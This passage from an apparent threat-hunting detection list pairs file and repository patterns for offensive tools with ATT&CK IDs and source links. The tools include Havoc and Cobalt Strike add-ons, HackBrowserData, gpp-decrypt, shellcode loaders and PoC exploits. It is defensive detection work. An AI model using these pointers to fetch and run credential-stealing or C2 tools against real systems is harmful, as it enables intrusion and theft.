Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*/gotato.go*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","1","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" +"*/goZulipC2.git*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" +"*/GPOddity.git*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*/GPOddity/*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*/gpp_autologin.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/gpp_password.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/gpp-decrypt*","offensive_tool_keyword","gpp-decrypt","Decrypt the given Group Policy Preferences","T1552.002 - T1212","TA0009 - TA0006","N/A","N/A","Credential Access","https://gitlab.com/kalilinux/packages/gpp-decrypt","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*/gpsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/GreatSCT/*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/GreatSCT/GreatSCT*","offensive_tool_keyword","GreatSCT","GreatSCT is a tool designed to generate metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions. GreatSCT is current under support by @ConsciousHacker","T1027 - T1055 - T1566 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/greatsct-output*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" +"*/Group3r.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/Grouper2.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/GruntHTTP.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/gtfobins.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/gtfobins.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*/guervild/BOFs*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/guessed_emails.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" +"*/gyaansastra/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" +"*/GzipB64.exe*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*/h8mail/*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" +"*/HackBrowserData*","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","8730","1373","2023-10-02T14:38:41Z","2020-06-18T03:24:31Z" +"*/hackerid.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/hackingtool.git*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*/Hack-Tools.git*","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5007","586","2023-10-03T15:40:37Z","2020-06-22T21:42:16Z" +"*/Hades.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*/hades.git*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*/HadesLdr.git*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*/hades-main.zip*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*/hadoop-datanode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hadoop-jobtracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hadoop-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hadoop-secondary-namenode-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hadoop-tasktracker-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Hak5.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/hakrawler.git*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*/hancitor.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/handlekatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/HandleKatz_BOF*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","93","17","2021-10-12T21:38:02Z","2021-10-12T18:45:06Z" +"*/HarmJ0y*","offensive_tool_keyword","Github Username","Co-founder of Empire. BloodHound. and the Veil-Framework | PowerSploit developer | krb lover | Microsoft PowerShell MVP | Security at the misfortune of others","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/HarmJ0y","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/HaryyUser.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/hash_spider.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/hashcat*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/hashdump_dc*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/Hashi0x/*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A",,"N/A",,, +"*/hashview.py*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*/havex.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/Havoc.cpp*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc.qss*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc.rc*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc/data/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Havoc/main/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/HavocFramework/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/HavocImages/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/havoc-py/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/hbase-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hbase-region-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hddtemp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 